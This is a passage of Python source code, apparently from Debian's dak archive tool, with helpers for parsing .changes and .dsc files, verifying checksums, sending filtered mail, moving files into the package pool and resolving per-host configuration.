
    'contrib/net' -> ('contrib/net', 'contrib'); a bare section like 'net'
    is resolved through get_component(), falling back to 'main' when the
    database knows no better.  Returns (section, component).
    """
    if '/' in section:
        component = section.split('/', 1)[0]
    else:
        component = ""

    # Expand default component
    if component == "":
        comp = get_component(section, session)
        component = "main" if comp is None else comp.component_name

    return (section, component)
################################################################################
def parse_deb822(armored_contents, signing_rules=0, keyrings=None, session=None):
    """Parse a deb822 (RFC822-ish) stanza, optionally PGP-signed.

    @param armored_contents: raw (possibly armor-signed) text
    @param signing_rules: 1 enables strict dpkg-source-style checking (a
        blank line before EOF is fatal); other values relax this
    @param keyrings: keyrings for signature verification; None means no
        signature is required
    @return: dict of lower-cased field name -> value; the raw input is kept
        under the 'filecontents' key
    @raise ParseChangesError: on malformed input
    @raise InvalidDscError: in strict mode, on a premature blank line
    """
    require_signature = True
    if keyrings == None:
        keyrings = []
        require_signature = False
    signed_file = SignedFile(armored_contents, keyrings=keyrings, require_signature=require_signature)
    contents = signed_file.contents

    error = ""
    changes = {}

    # Split the lines in the input, keeping the linebreaks.
    lines = contents.splitlines(True)

    if len(lines) == 0:
        raise ParseChangesError("[Empty changes file]")

    # Reindex by line number so we can easily verify the format of
    # .dsc files...
    index = 0
    indexed_lines = {}
    for line in lines:
        index += 1
        indexed_lines[index] = line[:-1]

    num_of_lines = len(indexed_lines.keys())
    index = 0
    # `first` tracks whether we are at the first continuation line of a
    # multi-line field (-1: no field seen yet, 1: field just started).
    first = -1
    while index < num_of_lines:
        index += 1
        line = indexed_lines[index]
        if line == "" and signing_rules == 1:
            if index != num_of_lines:
                raise InvalidDscError(index)
            break
        slf = re_single_line_field.match(line)
        if slf:
            field = slf.groups()[0].lower()
            changes[field] = slf.groups()[1]
            first = 1
            continue
        # " ." is the deb822 encoding of a blank line inside a field body.
        if line == " .":
            changes[field] += '\n'
            continue
        mlf = re_multi_line_field.match(line)
        if mlf:
            if first == -1:
                raise ParseChangesError("'%s'\n [Multi-line field continuing on from nothing?]" % (line))
            if first == 1 and changes[field] != "":
                changes[field] += '\n'
            first = 0
            changes[field] += mlf.groups()[0] + '\n'
            continue
        # Anything unrecognised is accumulated and reported at the end.
        error += line

    changes["filecontents"] = armored_contents

    if changes.has_key("source"):
        # Strip the source version in brackets from the source field,
        # put it in the "source-version" field instead.
        srcver = re_srchasver.search(changes["source"])
        if srcver:
            changes["source"] = srcver.group(1)
            changes["source-version"] = srcver.group(2)

    if error:
        raise ParseChangesError(error)

    return changes
################################################################################
def parse_changes(filename, signing_rules=0, dsc_file=0, keyrings=None):
    """
    Parses a changes file and returns a dictionary where each field is a
    key.  The mandatory first argument is the filename of the .changes
    file.

    signing_rules is an optional argument:

      - If signing_rules == -1, no signature is required.
      - If signing_rules == 0 (the default), a signature is required.
      - If signing_rules == 1, it turns on the same strict format checking
        as dpkg-source.

    The rules for (signing_rules == 1)-mode are:

      - The PGP header consists of "-----BEGIN PGP SIGNED MESSAGE-----"
        followed by any PGP header data and must end with a blank line.

      - The data section must end with a blank line and must be followed by
        "-----BEGIN PGP SIGNATURE-----".

    @raise ChangesUnicodeError: when the file is not valid UTF-8
    @raise ParseChangesError: when a mandatory field is missing (only
        checked for .changes files, i.e. when dsc_file is false)
    """
    changes_in = open_file(filename)
    content = changes_in.read()
    changes_in.close()
    try:
        # Validate encoding up front so downstream consumers can assume UTF-8.
        unicode(content, 'utf-8')
    except UnicodeError:
        raise ChangesUnicodeError("Changes file not proper utf-8")
    changes = parse_deb822(content, signing_rules, keyrings=keyrings)


    if not dsc_file:
        # Finally ensure that everything needed for .changes is there
        must_keywords = ('Format', 'Date', 'Source', 'Binary', 'Architecture', 'Version',
                         'Distribution', 'Maintainer', 'Description', 'Changes', 'Files')

        missingfields=[]
        for keyword in must_keywords:
            if not changes.has_key(keyword.lower()):
                missingfields.append(keyword)

                if len(missingfields):
                    raise ParseChangesError("Missing mandantory field(s) in changes file (policy 5.5): %s" % (missingfields))

    return changes
################################################################################
def hash_key(hashname):
    """Return the files-dict key under which *hashname*'s digest is stored."""
    return hashname + 'sum'
################################################################################
def create_hash(where, files, hashname, hashfunc):
    """
    create_hash extends the passed files dict with the given hash by
    iterating over all files on disk and passing them to the hashing
    function given.

    @param where: label used in rejection messages (unused here, kept for
        symmetry with check_hash)
    @param files: dict of filename -> metadata dict; updated in place
    @param hashname: name of the hash (e.g. 'sha1'); stored under
        hash_key(hashname)
    @param hashfunc: callable taking an open file object and returning the
        digest
    @return: list of rejection messages for unreadable files
    """

    rejmsg = []
    for f in files.keys():
        try:
            file_handle = open_file(f)
        except CantOpenError:
            rejmsg.append("Could not open file %s for checksumming" % (f))
            continue

        files[f][hash_key(hashname)] = hashfunc(file_handle)

        file_handle.close()
    return rejmsg
################################################################################
def check_hash(where, files, hashname, hashfunc):
    """
    check_hash checks the given hash in the files dict against the actual
    files on disk.  The hash values need to be present consistently in
    all file entries.  It does not modify its input in any way.

    @param where: label (e.g. '.changes') used in rejection messages
    @param files: dict of filename -> metadata dict containing the expected
        digest under hash_key(hashname)
    @param hashname: name of the hash being verified
    @param hashfunc: callable taking an open file object and returning the
        digest
    @return: list of rejection messages (empty when everything matches)
    """

    rejmsg = []
    for f in files.keys():
        file_handle = None
        try:
            try:
                file_handle = open_file(f)

                # Check for the hash entry, to not trigger a KeyError.
                if not files[f].has_key(hash_key(hashname)):
                    rejmsg.append("%s: misses %s checksum in %s" % (f, hashname,
                        where))
                    continue

                # Actually check the hash for correctness.
                if hashfunc(file_handle) != files[f][hash_key(hashname)]:
                    rejmsg.append("%s: %s check failed in %s" % (f, hashname,
                        where))
            except CantOpenError:
                # TODO: This happens when the file is in the pool.
                # warn("Cannot open file %s" % f)
                continue
        finally:
            if file_handle:
                file_handle.close()
    return rejmsg
################################################################################
def check_size(where, files):
    """
    Compare the 'size' recorded for each entry of *files* against the actual
    on-disk size and return a list of rejection messages (empty when all
    sizes match).  Files missing from disk are skipped silently, as they may
    already live in the pool.
    """
    rejmsg = []
    for fname in files.keys():
        try:
            actual_size = os.stat(fname)[stat.ST_SIZE]
        except OSError as exc:
            if exc.errno == 2:
                # TODO: This happens when the file is in the pool.
                continue
            raise

        expected_size = int(files[fname]["size"])
        if expected_size != actual_size:
            rejmsg.append("%s: actual file size (%s) does not match size (%s) in %s"
                          % (fname, actual_size, expected_size, where))
    return rejmsg
################################################################################
def check_dsc_files(dsc_filename, dsc=None, dsc_files=None):
    """
    Verify that the files listed in the Files field of the .dsc are
    those expected given the announced Format.

    @type dsc_filename: string
    @param dsc_filename: path of .dsc file

    @type dsc: dict
    @param dsc: the content of the .dsc parsed by C{parse_changes()}

    @type dsc_files: dict
    @param dsc_files: the file list returned by C{build_file_list()}

    @rtype: list
    @return: all errors detected
    """
    rejmsg = []

    # Parse the file if needed
    if dsc is None:
        dsc = parse_changes(dsc_filename, signing_rules=1, dsc_file=1)

    if dsc_files is None:
        dsc_files = build_file_list(dsc, is_a_dsc=1)

    # Ensure .dsc lists proper set of source files according to the format
    # announced
    has = defaultdict(lambda: 0)

    ftype_lookup = (
        (r'orig.tar.gz',               ('orig_tar_gz', 'orig_tar')),
        (r'diff.gz',                   ('debian_diff',)),
        (r'tar.gz',                    ('native_tar_gz', 'native_tar')),
        (r'debian\.tar\.(gz|bz2|xz)',  ('debian_tar',)),
        (r'orig\.tar\.(gz|bz2|xz)',    ('orig_tar',)),
        (r'tar\.(gz|bz2|xz)',          ('native_tar',)),
        (r'orig-.+\.tar\.(gz|bz2|xz)', ('more_orig_tar',)),
    )

    for f in dsc_files.keys():
        m = re_issource.match(f)
        if not m:
            rejmsg.append("%s: %s in Files field not recognised as source."
                          % (dsc_filename, f))
            continue

        # Populate 'has' dictionary by resolving keys in lookup table
        matched = False
        for regex, keys in ftype_lookup:
            if re.match(regex, m.group(3)):
                matched = True
                for key in keys:
                    has[key] += 1
                break

        # File does not match anything in lookup table; reject
        if not matched:
            # BUG FIX: this used to call an undefined name reject(), which
            # raised NameError instead of recording the problem; accumulate
            # the message like every other check in this function.
            rejmsg.append("%s: unexpected source file '%s'" % (dsc_filename, f))

    # Check for multiple files
    for file_type in ('orig_tar', 'native_tar', 'debian_tar', 'debian_diff'):
        if has[file_type] > 1:
            rejmsg.append("%s: lists multiple %s" % (dsc_filename, file_type))

    # Source format specific tests
    try:
        format = get_format_from_string(dsc['format'])
        rejmsg.extend([
            '%s: %s' % (dsc_filename, x) for x in format.reject_msgs(has)
        ])

    except UnknownFormatError:
        # Not an error here for now
        pass

    return rejmsg
################################################################################
def check_hash_fields(what, manifest):
    """
    Ensure *manifest* contains no 'checksums-*' fields for hashes we do not
    know about (see the module-level known_hashes table).  Returns a list of
    rejection messages, one per unsupported hash field.
    """
    rejmsg = []

    supported = [entry[0] for entry in known_hashes]
    for field in manifest:
        if not field.startswith("checksums-"):
            continue
        hashname = field.split("-", 1)[1]
        if hashname not in supported:
            rejmsg.append("Unsupported checksum field for %s in %s" % (hashname, what))

    return rejmsg
################################################################################
def _ensure_changes_hash(changes, format, version, files, hashname, hashfunc):
    """Ensure every entry of *files* carries the given hash.

    When the .changes format is new enough (>= *version*) the hashes must
    already be present in the changes file, so they are imported and then
    verified against disk; for older formats they cannot exist in the file
    and are computed from disk instead.  Returns rejection messages.
    """
    if format >= version:
        # The version should contain the specified hash.
        func = check_hash

        # Import hashes from the changes
        rejmsg = parse_checksums(".changes", files, changes, hashname)
        if len(rejmsg) > 0:
            return rejmsg
    else:
        # We need to calculate the hash because it can't possibly
        # be in the file.
        func = create_hash
    return func(".changes", files, hashname, hashfunc)
# We could add the orig which might be in the pool to the files dict to
# access the checksums easily.
def _ensure_dsc_hash(dsc, dsc_files, hashname, hashfunc):
    """
    ensure_dsc_hashes' task is to ensure that each and every *present* hash
    in the dsc is correct, i.e. identical to the changes file and if necessary
    the pool.  The latter task is delegated to check_hash.

    A missing 'Checksums-<hashname>' field is not an error (older formats);
    the function simply returns no rejections in that case.
    """
    rejmsg = []
    if not dsc.has_key('Checksums-%s' % (hashname,)):
        return rejmsg
    # Import hashes from the dsc
    parse_checksums(".dsc", dsc_files, dsc, hashname)
    # And check it...
    rejmsg.extend(check_hash(".dsc", dsc_files, hashname, hashfunc))
    return rejmsg
################################################################################
def parse_checksums(where, files, manifest, hashname):
    """Import 'checksums-<hashname>' entries from *manifest* into *files*.

    Each checksum line is '<digest> <size> <filename>'.  Digests are stored
    in files[name] under hash_key(hashname).  Returns rejection messages for
    unparsable lines, size mismatches, and files lacking a checksum entry.
    Note: sizes are compared as strings, which matches the string sizes
    stored by build_file_list().
    """
    rejmsg = []
    field = 'checksums-%s' % hashname
    if not field in manifest:
        return rejmsg
    # An empty line terminates the field body.
    for line in manifest[field].split('\n'):
        if not line:
            break
        clist = line.strip().split(' ')
        if len(clist) == 3:
            checksum, size, checkfile = clist
        else:
            rejmsg.append("Cannot parse checksum line [%s]" % (line))
            continue
        if not files.has_key(checkfile):
            # TODO: check for the file's entry in the original files dict, not
            # the one modified by (auto)byhand and other weird stuff
            #             rejmsg.append("%s: not present in files but in checksums-%s in %s" %
            #                 (file, hashname, where))
            continue
        if not files[checkfile]["size"] == size:
            rejmsg.append("%s: size differs for files and checksums-%s entry "\
                "in %s" % (checkfile, hashname, where))
            continue
        files[checkfile][hash_key(hashname)] = checksum
    for f in files.keys():
        if not files[f].has_key(hash_key(hashname)):
            rejmsg.append("%s: no entry in checksums-%s in %s" % (f, hashname, where))
    return rejmsg
################################################################################
# Dropped support for 1.4 and ``buggy dchanges 3.4'' (?!) compared to di.pl
# Dropped support for 1.4 and ``buggy dchanges 3.4'' (?!) compared to di.pl
def build_file_list(changes, is_a_dsc=0, field="files", hashname="md5sum"):
    """Parse the Files (or checksums) field of a parsed changes/dsc dict.

    Each line is '<digest> <size> [<section> <priority>] <name>'; section
    and priority are only present in a .changes 'files' field.  Returns a
    dict of name -> {size, section, priority, component, <hashname>}.

    @raise NoFilesFieldError: when the requested field is absent
    @raise ParseChangesError: when a line does not split as expected
    """
    files = {}

    # Make sure we have a Files: field to parse...
    if not changes.has_key(field):
        raise NoFilesFieldError

    # Validate .changes Format: field
    if not is_a_dsc:
        validate_changes_format(parse_format(changes['format']), field)

    includes_section = (not is_a_dsc) and field == "files"

    # Parse each entry/line:
    for i in changes[field].split('\n'):
        if not i:
            break
        s = i.split()
        section = priority = ""
        try:
            if includes_section:
                (md5, size, section, priority, name) = s
            else:
                (md5, size, name) = s
        except ValueError:
            raise ParseChangesError(i)

        # "-" is the conventional placeholder for an empty section/priority.
        if section == "":
            section = "-"
        if priority == "":
            priority = "-"

        (section, component) = extract_component_from_section(section)

        files[name] = dict(size=size, section=section,
                           priority=priority, component=component)
        files[name][hashname] = md5

    return files
################################################################################
# see http://bugs.debian.org/619131
def build_package_list(dsc, session = None):
    """Parse the Package-List field of a parsed .dsc into a dict.

    Returns {package_name: {priority, section, type, component, files: []}}
    or {} when the field is absent.  A later binary entry overrides an
    earlier 'dsc' entry for the same name.  When a session is supplied,
    unknown package types abort via fubar().
    """
    if not dsc.has_key("package-list"):
        return {}

    packages = {}

    for line in dsc["package-list"].split("\n"):
        if not line:
            break

        fields = line.split()
        name = fields[0]
        package_type = fields[1]
        (section, component) = extract_component_from_section(fields[2])
        priority = fields[3]

        # Validate type if we have a session
        if session and get_override_type(package_type, session) is None:
            # Maybe just warn and ignore? exit(1) might be a bit hard...
            # BUG FIX: this module *is* utils, so the old call to
            # utils.fubar() raised NameError; call fubar() directly.
            fubar("invalid type (%s) in Package-List." % (package_type))

        if name not in packages or packages[name]["type"] == "dsc":
            packages[name] = dict(priority=priority, section=section, type=package_type, component=component, files=[])

    return packages
################################################################################
def send_mail (message, filename=""):
    """sendmail wrapper, takes _either_ a message string or a file as arguments

    Honours Dinstall::Options::No-Mail (silently does nothing) and
    Dinstall::MailWhiteList (recipients not on the whitelist are stripped;
    if none remain, the mail is dropped entirely).
    @raise SendmailFailedError: when the sendmail command exits non-zero
    """
    # Check whether we're supposed to be sending mail
    if Cnf.has_key("Dinstall::Options::No-Mail") and Cnf["Dinstall::Options::No-Mail"]:
        return

    # If we've been passed a string dump it into a temporary file
    if message:
        (fd, filename) = tempfile.mkstemp()
        os.write (fd, message)
        os.close (fd)

    if Cnf.has_key("Dinstall::MailWhiteList") and \
           Cnf["Dinstall::MailWhiteList"] != "":
        message_in = open_file(filename)
        message_raw = modemail.message_from_file(message_in)
        message_in.close();

        whitelist = [];
        whitelist_in = open_file(Cnf["Dinstall::MailWhiteList"])
        try:
            # Whitelist entries are either regexes (marked lines) or
            # literal addresses; comments/blank lines are skipped.
            for line in whitelist_in:
                if not re_whitespace_comment.match(line):
                    if re_re_mark.match(line):
                        whitelist.append(re.compile(re_re_mark.sub("", line.strip(), 1)))
                    else:
                        whitelist.append(re.compile(re.escape(line.strip())))
        finally:
            whitelist_in.close()

        # Fields to check.
        fields = ["To", "Bcc", "Cc"]
        for field in fields:
            # Check each field
            value = message_raw.get(field, None)
            if value != None:
                match = [];
                for item in value.split(","):
                    (rfc822_maint, rfc2047_maint, name, email) = fix_maintainer(item.strip())
                    mail_whitelisted = 0
                    for wr in whitelist:
                        if wr.match(email):
                            mail_whitelisted = 1
                            break
                    if not mail_whitelisted:
                        print "Skipping %s since it's not in %s" % (item, Cnf["Dinstall::MailWhiteList"])
                        continue
                    match.append(item)

                # Doesn't have any mail in whitelist so remove the header
                if len(match) == 0:
                    del message_raw[field]
                else:
                    message_raw.replace_header(field, ', '.join(match))

        # Change message fields in order if we don't have a To header
        if not message_raw.has_key("To"):
            fields.reverse()
            for field in fields:
                if message_raw.has_key(field):
                    message_raw[fields[-1]] = message_raw[field]
                    del message_raw[field]
                    break
            else:
                # Clean up any temporary files
                # and return, as we removed all recipients.
                if message:
                    os.unlink (filename);
                return;

        # Rewrite the (temporary) file with the filtered message.
        # NOTE(review): O_EXCL without O_CREAT has no defined effect when
        # opening an existing file, and the file is not truncated first --
        # presumably safe because the filtered message is never shorter in
        # practice; confirm before reusing this pattern.
        fd = os.open(filename, os.O_RDWR|os.O_EXCL, 0o700);
        os.write (fd, message_raw.as_string(True));
        os.close (fd);

    # Invoke sendmail
    (result, output) = commands.getstatusoutput("%s < %s" % (Cnf["Dinstall::SendmailCommand"], filename))
    if (result != 0):
        raise SendmailFailedError(output)

    # Clean up any temporary files
    if message:
        os.unlink (filename)
################################################################################
def poolify (source, component):
    """Return the pool subdirectory for *source* within *component*.

    Debian pool layout: 'lib*' packages hash on their first four letters,
    everything else on the first letter, e.g. ('libc6', 'main') ->
    'main/libc/libc6/'.  An empty component yields no leading path element.
    """
    prefix = component + '/' if component else ''
    hashdir = source[:4] if source[:3] == "lib" else source[:1]
    return prefix + hashdir + '/' + source + '/'
################################################################################
def move (src, dest, overwrite = 0, perms = 0o664):
    """Move *src* to *dest*, creating missing destination directories.

    Directories are created mode 02775 with the umask cleared.  When *dest*
    is a directory the file keeps its basename.  Existing destinations are
    fatal (via fubar) unless *overwrite* is set and the file is writable.
    The moved file's mode is forced to *perms*.
    """
    # Resolve the directory that must exist before we can write dest.
    target_dir = dest if os.path.isdir(dest) else os.path.dirname(dest)
    if not os.path.exists(target_dir):
        saved_umask = os.umask(0o000)
        os.makedirs(target_dir, 0o2775)
        os.umask(saved_umask)
    #print "Moving %s to %s..." % (src, dest)
    if os.path.isdir(dest):
        dest = dest + '/' + os.path.basename(src)
    # Don't overwrite unless forced to
    if os.path.exists(dest):
        if not overwrite:
            fubar("Can't move %s to %s - file already exists." % (src, dest))
        if not os.access(dest, os.W_OK):
            fubar("Can't move %s to %s - can't write to existing file." % (src, dest))
    shutil.copy2(src, dest)
    os.chmod(dest, perms)
    os.unlink(src)
def copy (src, dest, overwrite = 0, perms = 0o664):
    """Copy *src* to *dest* (mirror of move(), but the source is kept).

    Missing destination directories are created mode 02775 with the umask
    cleared.  When *dest* is a directory the file keeps its basename.
    Raises FileExistsError if the destination exists and *overwrite* is
    unset, CantOverwriteError if it exists but is not writable.  The copy's
    mode is forced to *perms*.
    """
    target_dir = dest if os.path.isdir(dest) else os.path.dirname(dest)
    if not os.path.exists(target_dir):
        saved_umask = os.umask(0o000)
        os.makedirs(target_dir, 0o2775)
        os.umask(saved_umask)
    #print "Copying %s to %s..." % (src, dest)
    if os.path.isdir(dest):
        dest = dest + '/' + os.path.basename(src)
    # Don't overwrite unless forced to
    if os.path.exists(dest):
        if not overwrite:
            raise FileExistsError
        if not os.access(dest, os.W_OK):
            raise CantOverwriteError
    shutil.copy2(src, dest)
    os.chmod(dest, perms)
################################################################################
def where_am_i ():
    """Return this host's identity: the DatabaseHostname configured for the
    FQDN in Cnf if any, otherwise the FQDN itself."""
    res = socket.getfqdn()
    database_hostname = Cnf.get("Config::" + res + "::DatabaseHostname")
    if database_hostname:
        return database_hostname
    else:
        return res
def which_conf_file ():
    """Return the dak config file path for this host.

    Resolution order: $DAK_CONFIG, then (when AllowLocalConfig is set for
    this host) a per-user config below $HOME is merged into Cnf, then a
    host-specific DakConfig from Cnf, finally the global default.
    """
    if os.getenv('DAK_CONFIG'):
        return os.getenv('DAK_CONFIG')

    res = socket.getfqdn()
    # In case we allow local config files per user, try if one exists
    if Cnf.find_b("Config::" + res + "::AllowLocalConfig"):
        homedir = os.getenv("HOME")
        # BUG FIX: os.path.join(homedir, "/etc/dak.conf") discarded homedir
        # entirely because the second component is absolute; use a relative
        # component so the per-user file really lives below $HOME.
        confpath = os.path.join(homedir, "etc/dak.conf")
        if os.path.exists(confpath):
            apt_pkg.ReadConfigFileISC(Cnf,confpath)

    # We are still in here, so there is no local config file or we do
    # not allow local files. Do the normal stuff.
    if Cnf.get("Config::" + res + "::DakConfig"):
        return Cnf["Config::" + res + "::DakConfig"]

    return default_config
def which_apt_conf_file ():
    """Return the apt config file path for this host.

    Mirrors which_conf_file(): an allowed per-user config below $HOME is
    merged into Cnf first, then a host-specific AptConfig wins over the
    global default.
    """
    res = socket.getfqdn()
    # In case we allow local config files per user, try if one exists
    if Cnf.find_b("Config::" + res + "::AllowLocalConfig"):
        homedir = os.getenv("HOME")
        # BUG FIX (x2): the join used an absolute second component (which
        # silently discarded homedir), and the copy-pasted read loaded
        # default_config instead of the per-user file it had just located.
        confpath = os.path.join(homedir, "etc/dak.conf")
        if os.path.exists(confpath):
            apt_pkg.ReadConfigFileISC(Cnf,confpath)

    if Cnf.get("Config::" + res + "::AptConfig"):
        return Cnf["Config::" + res + "::AptConfig"]
    else:
        return default_apt_config
def which_alias_file():
    """Return the host-specific forward-alias file path, or None if that
    file does not exist on this machine."""
    aliasfn = '/var/lib/misc/' + socket.getfqdn() + '/forward-alias'
    return aliasfn if os.path.exists(aliasfn) else None
################################################################################
def TemplateSubst(subst_map, filename):
    """Read the template *filename* and replace every occurrence of each
    subst_map key with str() of its value; return the resulting text."""
    fh = open_file(filename)
    try:
        text = fh.read()
    finally:
        fh.close()
    for key, value in subst_map.iteritems():
        text = text.replace(key, str(value))
    return text
################################################################################
def fubar(msg, exit_code=1):
    """Write an error line to stderr and terminate with *exit_code*."""
    sys.stderr.write("E: %s\n" % msg)
    sys.exit(exit_code)

def warn(msg):
    """Write a warning line to stderr (execution continues)."""
    sys.stderr.write("W: %s\n" % msg)
################################################################################
# Returns the user name with a laughable attempt at rfc822 conformancy
# (read: removing stray periods).
def whoami ():
    """Real name (GECOS field) of the current user with '.' removed."""
    gecos = pwd.getpwuid(os.getuid()).pw_gecos
    return gecos.split(',')[0].replace('.', '')

def getusername ():
    """Login name of the current user."""
    return pwd.getpwuid(os.getuid()).pw_name
################################################################################
def size_type (c):
    """Render byte count *c* as a short human-readable string.

    Steps down by 1024 at most twice, switching units only above 10240 of
    the current unit, so results stay in the familiar 'NNNN B/KB/MB' range.
    """
    if c <= 10240:
        return "%d B" % c
    c = c / 1024
    if c <= 10240:
        return "%d KB" % c
    return "%d MB" % (c / 1024)
################################################################################
def cc_fix_changes (changes):
    """Replace the space-separated 'architecture' string in *changes* with a
    dict mapping each architecture name to 1 (in place)."""
    arch_string = changes.get("architecture", "")
    if arch_string:
        del changes["architecture"]
    changes["architecture"] = {}
    for arch in arch_string.split():
        changes["architecture"][arch] = 1
def changes_compare (a, b):
    """ Sort by source name, source version, 'have source', and then by filename """
    # cmp()-style comparator for .changes filenames (Python 2 sort API).
    # Unparseable files are deliberately pushed to one end rather than
    # raising, so sorting a mixed list never fails.
    try:
        a_changes = parse_changes(a)
    except:
        return -1
    try:
        b_changes = parse_changes(b)
    except:
        return 1
    # Normalise the architecture fields into dicts (see cc_fix_changes).
    cc_fix_changes (a_changes)
    cc_fix_changes (b_changes)
    # Sort by source name
    a_source = a_changes.get("source")
    b_source = b_changes.get("source")
    q = cmp (a_source, b_source)
    if q:
        return q
    # Sort by source version
    a_version = a_changes.get("version", "0")
    b_version = b_changes.get("version", "0")
    q = apt_pkg.version_compare(a_version, b_version)
    if q:
        return q
    # Sort by 'have source': uploads that include source sort first.
    a_has_source = a_changes["architecture"].get("source")
    b_has_source = b_changes["architecture"].get("source")
    if a_has_source and not b_has_source:
        return -1
    elif b_has_source and not a_has_source:
        return 1
    # Fall back to sort by filename
    return cmp(a, b)
################################################################################
def find_next_free (dest, too_many=100):
    """Return 'dest', or 'dest' with a numeric suffix ('.0', '.1', ...)
    appended, such that the resulting path does not exist yet.

    Raises NoFreeFilenameError once too_many suffixes have been tried.
    """
    base = dest
    suffix = 0
    while os.path.exists(dest) and suffix < too_many:
        dest = base + '.' + repr(suffix)
        suffix += 1
    if suffix >= too_many:
        raise NoFreeFilenameError
    return dest
################################################################################
def result_join (original, sep = '\t'):
    """Join the items of 'original' with 'sep', rendering None entries as
    the empty string (used when formatting DB query rows for output)."""
    # Generator join replaces the manual index loop (which used the
    # Python-2-only xrange and the '== None' anti-idiom).
    return sep.join("" if entry is None else entry for entry in original)
################################################################################
def prefix_multi_line_string(str, prefix, include_blank_lines=0):
    """Prefix every (stripped) line of 'str' with 'prefix'.

    Blank lines are dropped unless include_blank_lines is set.  The result
    carries no trailing newline.
    """
    kept = []
    for raw in str.split('\n'):
        stripped = raw.strip()
        if stripped or include_blank_lines:
            kept.append("%s%s" % (prefix, stripped))
    return "\n".join(kept)
################################################################################
def validate_changes_file_arg(filename, require_changes=1):
    """
    'filename' is either a .changes or .dak file.  A .dak name is mapped to
    the corresponding .changes file, which is then checked for existence
    and readability.  On success the .changes filename is returned.  On a
    problem, behaviour depends on 'require_changes':
      - require_changes == -1: errors are ignored, the .changes filename
        is returned anyway.
      - require_changes ==  0: a warning is printed and None is returned.
      - require_changes ==  1: a fatal error is raised (process exits).
    """
    orig_filename = filename
    if filename.endswith(".dak"):
        filename = filename[:-4] + ".changes"

    error = None
    if not filename.endswith(".changes"):
        error = "invalid file type; not a changes file"
    elif not os.access(filename, os.R_OK):
        error = "permission denied" if os.path.exists(filename) else "file not found"

    if not error:
        return filename
    if require_changes == 1:
        fubar("%s: %s." % (orig_filename, error))
    elif require_changes == 0:
        warn("Skipping %s - %s" % (orig_filename, error))
        return None
    else:
        # We only care about the .dak file
        return filename
################################################################################
def real_arch(arch):
    """True for a concrete architecture, i.e. anything but 'source'/'all'."""
    return arch not in ("source", "all")
################################################################################
def join_with_commas_and(list):
    """Join a list into English prose: '', 'a', 'a and b', 'a, b and c'.
    An empty list yields the word 'nothing'."""
    if not list:
        return "nothing"
    if len(list) == 1:
        return list[0]
    head = ", ".join(list[:-1])
    return head + " and " + list[-1]
################################################################################
def pp_deps (deps):
    """Pretty-print dependency atoms (pkg, version, constraint) joined by
    ' |' — e.g. [('foo','1.0','>=')] -> 'foo (>= 1.0)'."""
    rendered = []
    for (pkg, version, constraint) in deps:
        if constraint:
            rendered.append("%s (%s %s)" % (pkg, constraint, version))
        else:
            rendered.append(pkg)
    return " |".join(rendered)
################################################################################
def get_conf():
    """Return the module-global apt_pkg Configuration object ('Cnf')."""
    return Cnf
################################################################################
def parse_args(Options):
    """ Handle -a, -c and -s arguments; returns them as SQL constraints

    Returns a tuple (con_suites, con_architectures, con_components,
    check_source) where the three 'con_*' strings are SQL fragments of the
    form "AND <col>.id IN (...)" (empty when the option was not given) and
    check_source is 1 when 'source' was requested as an architecture.
    Unknown names produce a warning; if *none* of the given names for an
    option is valid, the process exits via fubar().
    """
    # XXX: This should go away and everything which calls it be converted
    #      to use SQLA properly.  For now, we'll just fix it not to use
    #      the old Pg interface though
    session = DBConn().session()
    # Process suite
    if Options["Suite"]:
        suite_ids_list = []
        for suitename in split_args(Options["Suite"]):
            suite = get_suite(suitename, session=session)
            if not suite or suite.suite_id is None:
                warn("suite '%s' not recognised." % (suite and suite.suite_name or suitename))
            else:
                suite_ids_list.append(suite.suite_id)
        if suite_ids_list:
            con_suites = "AND su.id IN (%s)" % ", ".join([ str(i) for i in suite_ids_list ])
        else:
            fubar("No valid suite given.")
    else:
        con_suites = ""
    # Process component
    if Options["Component"]:
        component_ids_list = []
        for componentname in split_args(Options["Component"]):
            component = get_component(componentname, session=session)
            if component is None:
                warn("component '%s' not recognised." % (componentname))
            else:
                component_ids_list.append(component.component_id)
        if component_ids_list:
            con_components = "AND c.id IN (%s)" % ", ".join([ str(i) for i in component_ids_list ])
        else:
            fubar("No valid component given.")
    else:
        con_components = ""
    # Process architecture
    con_architectures = ""
    check_source = 0
    if Options["Architecture"]:
        arch_ids_list = []
        for archname in split_args(Options["Architecture"]):
            # 'source' is not a real architecture row; flag it separately.
            if archname == "source":
                check_source = 1
            else:
                arch = get_architecture(archname, session=session)
                if arch is None:
                    warn("architecture '%s' not recognised." % (archname))
                else:
                    arch_ids_list.append(arch.arch_id)
        if arch_ids_list:
            con_architectures = "AND a.id IN (%s)" % ", ".join([ str(i) for i in arch_ids_list ])
        else:
            if not check_source:
                fubar("No valid architecture given.")
    else:
        check_source = 1
    return (con_suites, con_architectures, con_components, check_source)
################################################################################
def arch_compare_sw (a, b):
    """
    cmp()-style comparator for architecture names: 'source' sorts before
    every other architecture, otherwise plain string comparison.
    """
    a_is_source = (a == "source")
    b_is_source = (b == "source")
    if a_is_source and b_is_source:
        return 0
    if a_is_source:
        return -1
    if b_is_source:
        return 1
    return cmp (a, b)
################################################################################
def split_args (s, dwim=1):
    """
    Split command line arguments separated by either commas or whitespace.

    With dwim set, a trailing comma is treated as a fatal typo, since it
    usually means the user wrote 'dak ls -a i386, m68k foo' and the next
    word would silently become a separate argument.
    """
    if "," not in s:
        return s.split()
    if dwim and s.endswith(","):
        fubar("split_args: found trailing comma, spurious space maybe?")
    return s.split(",")
################################################################################
def gpgv_get_status_output(cmd, status_read, status_write):
    """
    Our very own version of commands.getouputstatus(), hacked to support
    gpgv's status fd.

    Runs 'cmd' through /bin/sh, keeping 'status_write' open in the child so
    gpgv can write its machine-readable status there.  Returns a tuple
    (output, status, exit_status): combined stdout+stderr text, the raw
    status-fd text, and the os.waitpid() exit status.
    """
    cmd = ['/bin/sh', '-c', cmd]
    p2cread, p2cwrite = os.pipe()
    c2pread, c2pwrite = os.pipe()
    errout, errin = os.pipe()
    pid = os.fork()
    if pid == 0:
        # Child
        # Rewire stdin/stdout/stderr onto our pipes (dup() reuses the
        # lowest free descriptor, hence the close-then-dup pairs).
        os.close(0)
        os.close(1)
        os.dup(p2cread)
        os.dup(c2pwrite)
        os.close(2)
        os.dup(errin)
        # Close everything else except the status fd gpgv writes to.
        for i in range(3, 256):
            if i != status_write:
                try:
                    os.close(i)
                except:
                    pass
        try:
            os.execvp(cmd[0], cmd)
        finally:
            os._exit(1)
    # Parent
    os.close(p2cread)
    # NOTE(review): these dup2() calls overwrite the parent's *write*-end
    # fd numbers with the read ends, so the later select()/read() on
    # c2pwrite/errin actually reads the pipes.  Odd but historical —
